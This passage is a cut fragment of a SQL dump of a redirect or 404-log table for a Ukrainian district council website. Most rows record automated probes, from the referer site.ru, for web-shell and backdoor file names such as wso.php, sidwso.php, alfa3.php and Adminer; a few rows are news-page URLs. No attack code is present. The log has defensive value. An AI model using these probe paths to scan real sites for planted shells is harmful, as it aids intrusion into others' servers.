00:00:00',301),(35196,'https://malyn-rayrada.gov.ua/libraries/fof/utils/feal.php',NULL,'http://site.ru','',1,0,'2020-07-02 08:41:45','0000-00-00 00:00:00',301),(35197,'https://malyn-rayrada.gov.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/paste/images/feter.php',NULL,'http://site.ru','',1,0,'2020-07-02 08:42:42','0000-00-00 00:00:00',301),(35198,'https://malyn-rayrada.gov.ua/06b4.php',NULL,'http://site.ru','',2,0,'2020-07-02 08:43:06','0000-00-00 00:00:00',301),(35199,'https://malyn-rayrada.gov.ua/cli/01.php',NULL,'http://site.ru','',1,0,'2020-07-02 08:44:34','0000-00-00 00:00:00',301),(35200,'https://malyn-rayrada.gov.ua/libraries/fof/integration/joomla/filesystem/data.php',NULL,'http://site.ru','',2,0,'2020-07-02 08:45:27','0000-00-00 00:00:00',301),(35201,'https://malyn-rayrada.gov.ua/components/com_search/models/mide.php',NULL,'http://site.ru','',1,0,'2020-07-02 08:45:32','0000-00-00 00:00:00',301),(35202,'https://malyn-rayrada.gov.ua/templates/beez3/html/mod_breadcrumbs/data.php',NULL,'http://site.ru','',1,0,'2020-07-02 09:07:49','0000-00-00 00:00:00',301),(35203,'https://malyn-rayrada.gov.ua/images/chitradurga/licensed.php',NULL,'http://site.ru','',2,0,'2020-07-02 09:09:22','0000-00-00 00:00:00',301),(35204,'https://malyn-rayrada.gov.ua/yedek/404.php',NULL,'http://site.ru','',1,0,'2020-07-02 09:10:03','0000-00-00 00:00:00',301),(35205,'https://malyn-rayrada.gov.ua/tmp/com_csvi/streamed.php',NULL,'http://site.ru','',2,0,'2020-07-02 09:35:42','0000-00-00 00:00:00',301),(35206,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_contact/data.php',NULL,'http://site.ru','',1,0,'2020-07-02 09:37:47','0000-00-00 00:00:00',301),(35207,'https://malyn-rayrada.gov.ua/templates/protostar/css/gank.php.php',NULL,'http://site.ru','',1,0,'2020-07-02 09:42:02','0000-00-00 00:00:00',301),(35208,'https://malyn-rayrada.gov.ua/images/galerie-video/theme.php',NULL,'http://site.ru','',2,0,'2020-07-02 09:58:48','0000-00-00 00:00:00',301),(35209,'https://malyn-rayrada.gov.ua/a99d.php',NULL,'http://site.ru','',1,0,'2020-07-02 10:04:19','0000-00-00 00:00:00',301),(35210,'https://malyn-rayrada.gov.ua/zewuw0.php',NULL,'http://site.ru','',2,0,'2020-07-02 10:21:21','0000-00-00 00:00:00',301),(35211,'https://malyn-rayrada.gov.ua/components/com_contenthistory/wp-info.php',NULL,'http://site.ru','',2,0,'2020-07-02 10:22:36','0000-00-00 00:00:00',301),(35212,'https://malyn-rayrada.gov.ua/pressthis/content-post.php',NULL,'http://site.ru','',1,0,'2020-07-02 10:43:14','0000-00-00 00:00:00',301),(35213,'https://malyn-rayrada.gov.ua/wp-cent.php',NULL,'http://site.ru','',2,0,'2020-07-02 10:46:55','0000-00-00 00:00:00',301),(35214,'https://malyn-rayrada.gov.ua/components/com_finder/helpers/data.php',NULL,'http://site.ru','',4,0,'2020-07-02 10:49:28','0000-00-00 00:00:00',301),(35215,'https://malyn-rayrada.gov.ua/buptmcrups.php',NULL,'http://site.ru','',1,0,'2020-07-02 10:55:35','0000-00-00 00:00:00',301),(35216,'https://malyn-rayrada.gov.ua/cache/theme.php',NULL,'http://site.ru','',2,0,'2020-07-02 11:12:04','0000-00-00 00:00:00',301),(35217,'https://malyn-rayrada.gov.ua/templates/atomic/css/blueprint/src/images.php',NULL,'http://site.ru','',2,0,'2020-07-02 11:12:35','0000-00-00 00:00:00',301),(35218,'https://malyn-rayrada.gov.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',1,0,'2020-07-02 11:20:30','0000-00-00 00:00:00',301),(35219,'https://malyn-rayrada.gov.ua/index.php/1382-nashi-sportsmeni-pokazali-klas',NULL,'','',7,0,'2020-07-02 12:57:22','0000-00-00 00:00:00',301),(35220,'https://malyn-rayrada.gov.ua/index.php/1909-yakisni-ta-dostupni-tsini-na-poslugi-vzhe-sogodni',NULL,'','',13,0,'2020-07-02 12:57:37','0000-00-00 00:00:00',301),(35221,'https://malyn-rayrada.gov.ua/index.php/1911-vistup-nashikh-bortsiv-u-korosteni',NULL,'','',6,0,'2020-07-02 17:44:31','0000-00-00 00:00:00',301),(35222,'https://www.malyn-rayrada.gov.ua/index.php/1298-prijnyato-byudzhet-malinskogo-rajonu-na-2016-rik',NULL,'','',6,0,'2020-07-02 19:09:40','0000-00-00 00:00:00',301),(35223,'https://malyn-rayrada.gov.ua/index.php/1641-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',1,0,'2020-07-03 01:50:33','0000-00-00 00:00:00',301),(35224,'https://malyn-rayrada.gov.ua/adminer-4.2.3-mysql-en.php',NULL,'','',1,0,'2020-07-03 02:09:40','0000-00-00 00:00:00',301),(35225,'https://malyn-rayrada.gov.ua/libraries/joomla/html/parameter/element/thumb.php',NULL,'http://site.ru','',1,0,'2020-07-03 09:34:16','0000-00-00 00:00:00',301),(35226,'https://malyn-rayrada.gov.ua/plugins/system/jsnframework/libraries/joomlashine/upgrade/htaccess.php',NULL,'http://site.ru','',1,0,'2020-07-03 09:52:15','0000-00-00 00:00:00',301),(35227,'https://malyn-rayrada.gov.ua/plugins/system/xtp.php',NULL,'http://site.ru','',1,0,'2020-07-03 09:52:15','0000-00-00 00:00:00',301),(35228,'https://malyn-rayrada.gov.ua/templates/beez3/669898945622223556566.php',NULL,'http://site.ru','',2,0,'2020-07-03 10:15:14','0000-00-00 00:00:00',301),(35229,'https://malyn-rayrada.gov.ua/cache/widgetkit/data.php',NULL,'http://site.ru','',3,0,'2020-07-03 10:18:04','0000-00-00 00:00:00',301),(35230,'https://malyn-rayrada.gov.ua/tmp/install_4ffcb135841c9/hu-hu/apps/blog/language/wp-block.php',NULL,'http://site.ru','',1,0,'2020-07-03 10:22:33','0000-00-00 00:00:00',301),(35231,'https://malyn-rayrada.gov.ua/templates/beez3/images/system/data.php',NULL,'http://site.ru','',3,0,'2020-07-03 10:40:26','0000-00-00 00:00:00',301),(35232,'https://www.malyn-rayrada.gov.ua/index.php/1726-podatkova-znizhka',NULL,'','',3,0,'2020-07-03 11:04:29','0000-00-00 00:00:00',301),(35233,'https://malyn-rayrada.gov.ua/components/com_contenthistory/sex.php',NULL,'http://site.ru','',3,0,'2020-07-03 11:07:05','0000-00-00 00:00:00',301),(35234,'https://malyn-rayrada.gov.ua/libraries/joomla/base/wp-seca.php',NULL,'http://site.ru','',2,0,'2020-07-03 12:06:20','0000-00-00 00:00:00',301),(35235,'https://malyn-rayrada.gov.ua/alfa3.php',NULL,'http://site.ru','',2,0,'2020-07-03 12:16:17','0000-00-00 00:00:00',301),(35236,'https://malyn-rayrada.gov.ua/libraries/fof/model/behavior/.h..php',NULL,'http://site.ru','',1,0,'2020-07-03 12:16:26','0000-00-00 00:00:00',301),(35237,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_weblinks/form/data.php',NULL,'http://site.ru','',1,0,'2020-07-03 12:16:57','0000-00-00 00:00:00',301),(35238,'https://malyn-rayrada.gov.ua/cache/pp1.php',NULL,'http://site.ru','',1,0,'2020-07-03 12:25:11','0000-00-00 00:00:00',301),(35239,'https://malyn-rayrada.gov.ua/plugins1/editors/tinymce/jscripts/tiny_mce/themes/advanced/.h..php',NULL,'http://site.ru','',2,0,'2020-07-03 12:37:52','0000-00-00 00:00:00',301),(35240,'https://malyn-rayrada.gov.ua/cache/config.php',NULL,'http://site.ru','',2,0,'2020-07-03 12:39:55','0000-00-00 00:00:00',301),(35241,'https://malyn-rayrada.gov.ua/xxxx.php',NULL,'http://site.ru','',1,0,'2020-07-03 12:39:57','0000-00-00 00:00:00',301),(35242,'https://malyn-rayrada.gov.ua/back/cache/doc.php',NULL,'http://site.ru','',1,0,'2020-07-03 12:44:56','0000-00-00 00:00:00',301),(35243,'https://malyn-rayrada.gov.ua/wp-function.php',NULL,'http://site.ru','',1,0,'2020-07-03 13:04:27','0000-00-00 00:00:00',301),(35244,'https://malyn-rayrada.gov.ua/images/theme.php',NULL,'http://site.ru','',1,0,'2020-07-03 13:52:29','0000-00-00 00:00:00',301),(35245,'https://malyn-rayrada.gov.ua/xmlrpc/robots.txt.php',NULL,'http://site.ru','',3,0,'2020-07-03 13:53:57','0000-00-00 00:00:00',301),(35246,'https://malyn-rayrada.gov.ua/templates/beez/wp-muen.php',NULL,'http://site.ru','',2,0,'2020-07-03 13:58:04','0000-00-00 00:00:00',301),(35247,'https://malyn-rayrada.gov.ua/templates/beez3/html/layouts/data.php',NULL,'http://site.ru','',2,0,'2020-07-03 14:44:35','0000-00-00 00:00:00',301),(35248,'https://malyn-rayrada.gov.ua/templates/1/1.php',NULL,'http://site.ru','',1,0,'2020-07-03 14:48:01','0000-00-00 00:00:00',301),(35249,'https://malyn-rayrada.gov.ua/index.php/1956-vidbulas-robocha-narada-iz-sotsialnimi-robitnikami',NULL,'','',1,0,'2020-07-03 14:51:46','0000-00-00 00:00:00',301),(35250,'https://malyn-rayrada.gov.ua/plugins/finder/newsfeeds/yashiro.php',NULL,'http://site.ru','',1,0,'2020-07-03 14:53:55','0000-00-00 00:00:00',301),(35251,'https://malyn-rayrada.gov.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/emotions/ob.php',NULL,'http://site.ru','',1,0,'2020-07-03 15:10:57','0000-00-00 00:00:00',301),(35252,'https://malyn-rayrada.gov.ua/libraries/libraries.php',NULL,'http://site.ru','',3,0,'2020-07-03 15:11:24','0000-00-00 00:00:00',301),(35253,'https://malyn-rayrada.gov.ua/components/error.php',NULL,'http://site.ru','',1,0,'2020-07-03 15:18:54','0000-00-00 00:00:00',301),(35254,'https://malyn-rayrada.gov.ua/quarantine_h2144/content-post.php',NULL,'http://site.ru','',1,0,'2020-07-03 15:29:32','0000-00-00 00:00:00',301),(35255,'https://malyn-rayrada.gov.ua/cache/1.php',NULL,'http://site.ru','',1,0,'2020-07-03 15:33:46','0000-00-00 00:00:00',301),(35256,'https://malyn-rayrada.gov.ua/tt.php',NULL,'http://site.ru','',2,0,'2020-07-03 15:36:22','0000-00-00 00:00:00',301),(35257,'https://malyn-rayrada.gov.ua/cache/mmc.php',NULL,'http://site.ru','',2,0,'2020-07-03 16:00:34','0000-00-00 00:00:00',301),(35258,'https://malyn-rayrada.gov.ua/wp-log.php',NULL,'http://site.ru','',2,0,'2020-07-03 16:10:37','0000-00-00 00:00:00',301),(35259,'https://malyn-rayrada.gov.ua/ekp/wp-muen.php',NULL,'http://site.ru','',2,0,'2020-07-03 16:18:52','0000-00-00 00:00:00',301),(35260,'https://malyn-rayrada.gov.ua/site/components/com_media/mark.php',NULL,'http://site.ru','',2,0,'2020-07-03 16:25:44','0000-00-00 00:00:00',301),(35261,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/plugins/advlist/htaccess.php',NULL,'http://site.ru','',2,0,'2020-07-03 16:47:29','0000-00-00 00:00:00',301),(35262,'https://malyn-rayrada.gov.ua/images/pntn.php',NULL,'http://site.ru','',1,0,'2020-07-03 16:49:23','0000-00-00 00:00:00',301),(35263,'https://malyn-rayrada.gov.ua/images/eventlist/images.php',NULL,'http://site.ru','',1,0,'2020-07-03 16:50:15','0000-00-00 00:00:00',301),(35264,'https://malyn-rayrada.gov.ua/components/com_fileman/template/menus.php',NULL,'http://site.ru','',3,0,'2020-07-03 16:51:42','0000-00-00 00:00:00',301),(35265,'https://malyn-rayrada.gov.ua/cache/zz.php',NULL,'http://site.ru','',1,0,'2020-07-03 16:54:46','0000-00-00 00:00:00',301),(35266,'https://malyn-rayrada.gov.ua/components/com_users/55index.php',NULL,'http://site.ru','',1,0,'2020-07-03 17:13:07','0000-00-00 00:00:00',301),(35267,'https://malyn-rayrada.gov.ua/libraries/joomla/client/ob.php',NULL,'http://site.ru','',2,0,'2020-07-03 17:15:00','0000-00-00 00:00:00',301),(35268,'https://malyn-rayrada.gov.ua/index.php/1502-malinshchina-proshchaetsya-shche-z-odnim-geroem-oleksandrom-viktorovichem-yakhnovskim?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2020-07-03 17:21:38','0000-00-00 00:00:00',301),(35269,'https://malyn-rayrada.gov.ua/sad.php',NULL,'http://site.ru','',3,0,'2020-07-03 17:40:13','0000-00-00 00:00:00',301),(35270,'https://malyn-rayrada.gov.ua/templates/beez/ic.php',NULL,'http://site.ru','',1,0,'2020-07-03 18:04:36','0000-00-00 00:00:00',301),(35271,'https://malyn-rayrada.gov.ua/wp-log-7.php',NULL,'','',1,0,'2020-07-03 19:07:49','0000-00-00 00:00:00',301),(35272,'https://malyn-rayrada.gov.ua/index.php/1800-vitaemo-iz-svyatom-pershogo-dzvonika',NULL,'','',5,0,'2020-07-03 19:13:44','0000-00-00 00:00:00',301),(35273,'https://malyn-rayrada.gov.ua/index.php/1751-onovlennya-front-ofisu-obslugovuvannya-gromadyan-vidbulos-u-malinskomu-viddili-obslugovuvannya-gromadyan',NULL,'','',11,0,'2020-07-03 19:43:15','0000-00-00 00:00:00',301),(35274,'https://malyn-rayrada.gov.ua/poub/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',2,0,'2020-07-03 19:55:15','0000-00-00 00:00:00',301),(35275,'https://malyn-rayrada.gov.ua/plugins/system/system.php',NULL,'http://site.ru','',2,0,'2020-07-03 20:18:48','0000-00-00 00:00:00',301),(35276,'https://malyn-rayrada.gov.ua/testspan.kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-07-03 20:20:02','0000-00-00 00:00:00',301),(35277,'https://malyn-rayrada.gov.ua/index.php/1901-malinske-rajonne-upravlinnya-golovnogo-upravlinnya-derzhprodspozhivsluzhbi-v-zhitomirskij-oblasti-informue',NULL,'','',25,0,'2020-07-03 20:34:39','0000-00-00 00:00:00',301),(35278,'https://malyn-rayrada.gov.ua/images/edit_page.php',NULL,'http://site.ru','',2,0,'2020-07-03 20:43:22','0000-00-00 00:00:00',301),(35279,'https://malyn-rayrada.gov.ua/components/com_newsfeeds/helpers/wp-table.php',NULL,'http://site.ru','',1,0,'2020-07-03 20:43:57','0000-00-00 00:00:00',301),(35280,'https://malyn-rayrada.gov.ua/test/models.php',NULL,'http://site.ru','',1,0,'2020-07-03 21:06:26','0000-00-00 00:00:00',301),(35281,'https://malyn-rayrada.gov.ua/assets/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-03 21:11:44','0000-00-00 00:00:00',301),(35282,'https://malyn-rayrada.gov.ua/templates/ambient/cache/beautifu.php',NULL,'http://site.ru','',2,0,'2020-07-03 21:33:02','0000-00-00 00:00:00',301),(35283,'https://malyn-rayrada.gov.ua/images/maralur/licensed.php',NULL,'http://site.ru','',1,0,'2020-07-03 21:33:34','0000-00-00 00:00:00',301),(35284,'https://malyn-rayrada.gov.ua/templates/beez/info.php',NULL,'http://site.ru','',2,0,'2020-07-03 21:58:22','0000-00-00 00:00:00',301),(35285,'https://malyn-rayrada.gov.ua/cache/green.php',NULL,'http://site.ru','',1,0,'2020-07-03 21:59:04','0000-00-00 00:00:00',301),(35286,'https://malyn-rayrada.gov.ua/plugins1/system/legacy/content-post.php',NULL,'http://site.ru','',3,0,'2020-07-03 22:16:14','0000-00-00 00:00:00',301),(35287,'https://malyn-rayrada.gov.ua/ajax.php',NULL,'http://site.ru','',1,0,'2020-07-03 22:21:03','0000-00-00 00:00:00',301),(35288,'https://malyn-rayrada.gov.ua/ymihympfbq.php',NULL,'http://site.ru','',1,0,'2020-07-03 22:31:01','0000-00-00 00:00:00',301),(35289,'https://malyn-rayrada.gov.ua/xfx1ot.php',NULL,'http://site.ru','',2,0,'2020-07-03 22:46:05','0000-00-00 00:00:00',301),(35290,'https://malyn-rayrada.gov.ua/images/mijnuym.php',NULL,'http://site.ru','',2,0,'2020-07-03 22:48:16','0000-00-00 00:00:00',301),(35291,'https://malyn-rayrada.gov.ua/adminer-4.2.4-mysql-en.php',NULL,'','',1,0,'2020-07-03 23:42:17','0000-00-00 00:00:00',301),(35292,'https://malyn-rayrada.gov.ua/cache/wp-site.php',NULL,'http://site.ru','',3,0,'2020-07-03 23:56:22','0000-00-00 00:00:00',301),(35293,'https://malyn-rayrada.gov.ua/components/com_falang/readme.php',NULL,'http://site.ru','',2,0,'2020-07-03 23:57:48','0000-00-00 00:00:00',301),(35294,'https://malyn-rayrada.gov.ua/cache/jvotesystem/theme.php',NULL,'http://site.ru','',2,0,'2020-07-04 00:23:48','0000-00-00 00:00:00',301),(35295,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/plugins/tabfocus/htaccess.php',NULL,'http://site.ru','',3,0,'2020-07-04 00:50:59','0000-00-00 00:00:00',301),(35296,'https://malyn-rayrada.gov.ua/user-profile.php',NULL,'http://site.ru','',2,0,'2020-07-04 00:51:31','0000-00-00 00:00:00',301),(35297,'https://malyn-rayrada.gov.ua/img/img.php',NULL,'http://site.ru','',1,0,'2020-07-04 00:52:33','0000-00-00 00:00:00',301),(35298,'https://malyn-rayrada.gov.ua/components/com_mijoshop/opencart/image/data/readme.php',NULL,'http://site.ru','',2,0,'2020-07-04 01:12:56','0000-00-00 00:00:00',301),(35299,'https://malyn-rayrada.gov.ua/cmvgifotzz.php',NULL,'http://site.ru','',1,0,'2020-07-04 01:13:14','0000-00-00 00:00:00',301),(35300,'https://malyn-rayrada.gov.ua/sandvox_greyleaf/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-04 01:16:54','0000-00-00 00:00:00',301),(35301,'https://malyn-rayrada.gov.ua/blnvqechaa.php',NULL,'http://site.ru','',2,0,'2020-07-04 01:17:57','0000-00-00 00:00:00',301),(35302,'https://malyn-rayrada.gov.ua/libraries/joomla/base/feal.php',NULL,'http://site.ru','',3,0,'2020-07-04 01:18:12','0000-00-00 00:00:00',301),(35303,'https://malyn-rayrada.gov.ua/images/thkbth.php',NULL,'http://site.ru','',1,0,'2020-07-04 01:19:58','0000-00-00 00:00:00',301),(35304,'https://malyn-rayrada.gov.ua/cli/vpl20xjb.php',NULL,'http://site.ru','',3,0,'2020-07-04 01:43:10','0000-00-00 00:00:00',301),(35305,'https://malyn-rayrada.gov.ua/libraries/cms/installer/manifest/.h..php',NULL,'http://site.ru','',1,0,'2020-07-04 01:43:47','0000-00-00 00:00:00',301),(35306,'https://malyn-rayrada.gov.ua/components/com_jce/editor/tiny_mce/plugins/print/htaccess.php',NULL,'http://site.ru','',1,0,'2020-07-04 02:01:30','0000-00-00 00:00:00',301),(35307,'https://malyn-rayrada.gov.ua/zxpcis.php',NULL,'http://site.ru','',1,0,'2020-07-04 02:24:03','0000-00-00 00:00:00',301),(35308,'https://malyn-rayrada.gov.ua/components/com_jce/editor/extensions/mediaplayer/wp-blog.php',NULL,'http://site.ru','',1,0,'2020-07-04 02:25:56','0000-00-00 00:00:00',301),(35309,'https://malyn-rayrada.gov.ua/images/faculty/licensed.php',NULL,'http://site.ru','',2,0,'2020-07-04 02:29:09','0000-00-00 00:00:00',301),(35310,'https://malyn-rayrada.gov.ua/fhbvqppxkk.php',NULL,'http://site.ru','',1,0,'2020-07-04 02:50:22','0000-00-00 00:00:00',301),(35311,'https://malyn-rayrada.gov.ua/coexistsu.php',NULL,'http://site.ru','',2,0,'2020-07-04 02:51:46','0000-00-00 00:00:00',301),(35312,'https://malyn-rayrada.gov.ua/wp-user.php',NULL,'http://site.ru','',1,0,'2020-07-04 02:54:56','0000-00-00 00:00:00',301),(35313,'https://www.malyn-rayrada.gov.ua/index.php/1710-ogoloshennya',NULL,'','',1,0,'2020-07-04 03:11:58','0000-00-00 00:00:00',301),(35314,'https://malyn-rayrada.gov.ua/cache/wso.php',NULL,'http://site.ru','',1,0,'2020-07-04 03:15:52','0000-00-00 00:00:00',301),(35315,'https://malyn-rayrada.gov.ua/_resources/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-04 03:38:23','0000-00-00 00:00:00',301),(35316,'https://malyn-rayrada.gov.ua/bin/wp-log.php',NULL,'http://site.ru','',2,0,'2020-07-04 03:42:25','0000-00-00 00:00:00',301),(35317,'https://malyn-rayrada.gov.ua/wp-snapshots/wp-caches.php',NULL,'http://site.ru','',1,0,'2020-07-04 03:44:01','0000-00-00 00:00:00',301),(35318,'https://malyn-rayrada.gov.ua/components/com_search/models/tools.php',NULL,'http://site.ru','',2,0,'2020-07-04 04:24:51','0000-00-00 00:00:00',301),(35319,'https://malyn-rayrada.gov.ua/wp-block.php',NULL,'http://site.ru','',2,0,'2020-07-04 04:30:01','0000-00-00 00:00:00',301),(35320,'https://malyn-rayrada.gov.ua/components/com_foxcontact/line.php',NULL,'http://site.ru','',3,0,'2020-07-04 04:30:36','0000-00-00 00:00:00',301),(35321,'https://malyn-rayrada.gov.ua/images/galerie-video/images.php',NULL,'http://site.ru','',1,0,'2020-07-04 04:31:43','0000-00-00 00:00:00',301),(35322,'https://malyn-rayrada.gov.ua/templates/beez3/html/layouts/joomla/system/wp-img.php',NULL,'http://site.ru','',2,0,'2020-07-04 04:31:48','0000-00-00 00:00:00',301),(35323,'https://malyn-rayrada.gov.ua/images/1.php',NULL,'http://site.ru','',3,0,'2020-07-04 04:49:19','0000-00-00 00:00:00',301),(35324,'https://malyn-rayrada.gov.ua/amputatedkt.php',NULL,'http://site.ru','',1,0,'2020-07-04 05:18:53','0000-00-00 00:00:00',301),(35325,'https://malyn-rayrada.gov.ua/libraries/fof/utils/installscript/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-04 05:20:49','0000-00-00 00:00:00',301),(35326,'https://malyn-rayrada.gov.ua/templates/beez3/html/layouts/joomla/system/wp-south.php',NULL,'http://site.ru','',1,0,'2020-07-04 05:28:38','0000-00-00 00:00:00',301),(35327,'https://malyn-rayrada.gov.ua/index.php/1297-urochistosti-z-nagodi-25-richchya-pfu',NULL,'','',4,0,'2020-07-04 09:43:47','0000-00-00 00:00:00',301),(35328,'https://www.malyn-rayrada.gov.ua/index.php/1382-nashi-sportsmeni-pokazali-klas',NULL,'','',5,0,'2020-07-04 11:04:38','0000-00-00 00:00:00',301),(35329,'https://malyn-rayrada.gov.ua/index.php/1961-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-23-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',8,0,'2020-07-04 14:06:28','0000-00-00 00:00:00',301),(35330,'https://malyn-rayrada.gov.ua/index.php/1908-vik-rozvagam-ne-zavada',NULL,'','',12,0,'2020-07-04 19:49:20','0000-00-00 00:00:00',301),(35331,'https://www.malyn-rayrada.gov.ua/index.php/1785-vidbulas-18-sesiya-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2020-07-05 00:12:02','0000-00-00 00:00:00',301),(35332,'https://malyn-rayrada.gov.ua/index.php/1900-zmini-u-pensijnomu-zabezpechenni-gromadyan-z-1-sichnya-2018-roku',NULL,'','',6,0,'2020-07-05 05:31:41','0000-00-00 00:00:00',301),(35333,'https://www.malyn-rayrada.gov.ua/index.php/1904-nashi-bokseri-pokazali-dobri-rezultati-v-borispoli',NULL,'','',1,0,'2020-07-06 04:39:19','0000-00-00 00:00:00',301),(35334,'https://malyn-rayrada.gov.ua/index.php/1406-pro-dotrimannya-zakonu-ukrajini-pro-dostup-do-publichnoji-informatsiji-ta-reglamentu-roboti-rajonnoji-radi-vii-sklikannya',NULL,'','',2,0,'2020-07-06 05:19:11','0000-00-00 00:00:00',301),(35335,'https://www.malyn-rayrada.gov.ua/index.php/1749-vidbulis-zasidannya-postijnikh-komisij-rajonnoji-radi',NULL,'','',1,0,'2020-07-06 07:20:17','0000-00-00 00:00:00',301),(35336,'https://malyn-rayrada.gov.ua/includes/includes.php',NULL,'http://site.ru','',5,0,'2020-07-06 17:34:29','0000-00-00 00:00:00',301),(35337,'https://malyn-rayrada.gov.ua/wp-admin/code87/5.php',NULL,'http://site.ru','',2,0,'2020-07-06 19:02:44','0000-00-00 00:00:00',301),(35338,'https://malyn-rayrada.gov.ua/moshax.php',NULL,'http://site.ru','',3,0,'2020-07-06 21:35:32','0000-00-00 00:00:00',301),(35339,'https://malyn-rayrada.gov.ua/docindex.php',NULL,'http://site.ru','',6,0,'2020-07-06 22:07:11','0000-00-00 00:00:00',301),(35340,'https://malyn-rayrada.gov.ua/index.php/1950-film-kiborgi-v-malini',NULL,'','',17,0,'2020-07-07 02:22:42','0000-00-00 00:00:00',301),(35341,'https://www.malyn-rayrada.gov.ua/index.php/1785-vidbulas-18-sesiya-7-sklikannya',NULL,'','',3,0,'2020-07-07 04:22:55','0000-00-00 00:00:00',301),(35342,'https://malyn-rayrada.gov.ua/wp-admin/include.php.php',NULL,'http://site.ru','',2,0,'2020-07-07 09:05:16','0000-00-00 00:00:00',301),(35343,'https://malyn-rayrada.gov.ua/cache/cgejzindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 12:08:37','0000-00-00 00:00:00',301),(35344,'https://malyn-rayrada.gov.ua/index.php/1771-vitaemo-z-dnem-konstitutsiji-ukrajini',NULL,'','',16,0,'2020-07-07 12:38:42','0000-00-00 00:00:00',301),(35345,'https://malyn-rayrada.gov.ua/modules/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-07 12:58:04','0000-00-00 00:00:00',301),(35346,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/zr.php',NULL,'http://site.ru','',3,0,'2020-07-07 12:59:59','0000-00-00 00:00:00',301),(35347,'https://malyn-rayrada.gov.ua/plugins/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-07 13:26:10','0000-00-00 00:00:00',301),(35348,'https://malyn-rayrada.gov.ua/nsgin.com/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-07 13:26:41','0000-00-00 00:00:00',301),(35349,'https://malyn-rayrada.gov.ua/libraries/joomla/language/mnfmmindex.php',NULL,'http://site.ru','',3,0,'2020-07-07 13:49:09','0000-00-00 00:00:00',301),(35350,'https://www.malyn-rayrada.gov.ua/index.php/1903-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',2,0,'2020-07-07 14:08:12','0000-00-00 00:00:00',301),(35351,'https://malyn-rayrada.gov.ua/03fktm.php',NULL,'http://site.ru','',2,0,'2020-07-07 14:19:03','0000-00-00 00:00:00',301),(35352,'https://malyn-rayrada.gov.ua/ijiti5.php',NULL,'http://site.ru','',1,0,'2020-07-07 14:20:04','0000-00-00 00:00:00',301),(35353,'https://malyn-rayrada.gov.ua/media/media/data.php',NULL,'http://site.ru','',2,0,'2020-07-07 14:41:40','0000-00-00 00:00:00',301),(35354,'https://malyn-rayrada.gov.ua/oluxx.php',NULL,'http://site.ru','',1,0,'2020-07-07 14:47:24','0000-00-00 00:00:00',301),(35355,'https://malyn-rayrada.gov.ua/nsgin.com/doc.php',NULL,'http://site.ru','',2,0,'2020-07-07 15:06:56','0000-00-00 00:00:00',301),(35356,'https://malyn-rayrada.gov.ua/xmlrpc/includes/definesd.php',NULL,'http://site.ru','',2,0,'2020-07-07 15:10:26','0000-00-00 00:00:00',301),(35357,'https://malyn-rayrada.gov.ua/components/com_banners/models/css.php',NULL,'http://site.ru','',2,0,'2020-07-07 15:36:08','0000-00-00 00:00:00',301),(35358,'https://malyn-rayrada.gov.ua/nsyyg9.php',NULL,'http://site.ru','',4,0,'2020-07-07 16:04:21','0000-00-00 00:00:00',301),(35359,'https://malyn-rayrada.gov.ua/modules/mod_users_latest/data.php',NULL,'http://site.ru','',3,0,'2020-07-07 16:29:28','0000-00-00 00:00:00',301),(35360,'https://malyn-rayrada.gov.ua/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 16:52:49','0000-00-00 00:00:00',301),(35361,'https://malyn-rayrada.gov.ua/images/we.php',NULL,'http://site.ru','',1,0,'2020-07-07 17:24:30','0000-00-00 00:00:00',301),(35362,'https://malyn-rayrada.gov.ua/plugins/pluginsc.php',NULL,'http://site.ru','',1,0,'2020-07-07 17:44:17','0000-00-00 00:00:00',301),(35363,'https://malyn-rayrada.gov.ua/templates/fusion/fusion.php',NULL,'http://site.ru','',1,0,'2020-07-07 17:45:52','0000-00-00 00:00:00',301),(35364,'https://malyn-rayrada.gov.ua/oz2gu9.php',NULL,'http://site.ru','',3,0,'2020-07-07 17:47:12','0000-00-00 00:00:00',301),(35365,'https://malyn-rayrada.gov.ua/includes/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 18:38:27','0000-00-00 00:00:00',301),(35366,'https://malyn-rayrada.gov.ua/templates/protostar/news.php',NULL,'http://site.ru','',1,0,'2020-07-07 18:41:02','0000-00-00 00:00:00',301),(35367,'https://malyn-rayrada.gov.ua/layouts/joomla/opabha.php',NULL,'http://site.ru','',1,0,'2020-07-07 18:42:29','0000-00-00 00:00:00',301),(35368,'https://malyn-rayrada.gov.ua/cli/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-07 19:08:02','0000-00-00 00:00:00',301),(35369,'https://malyn-rayrada.gov.ua/modules/mod_verison/mod_verison.php',NULL,'http://site.ru','',2,0,'2020-07-07 19:59:45','0000-00-00 00:00:00',301),(35370,'https://malyn-rayrada.gov.ua/index.php/1381-t-g-shevchenko-vustami-ditej?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2020-07-07 19:59:53','0000-00-00 00:00:00',301),(35371,'https://malyn-rayrada.gov.ua/detallito.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 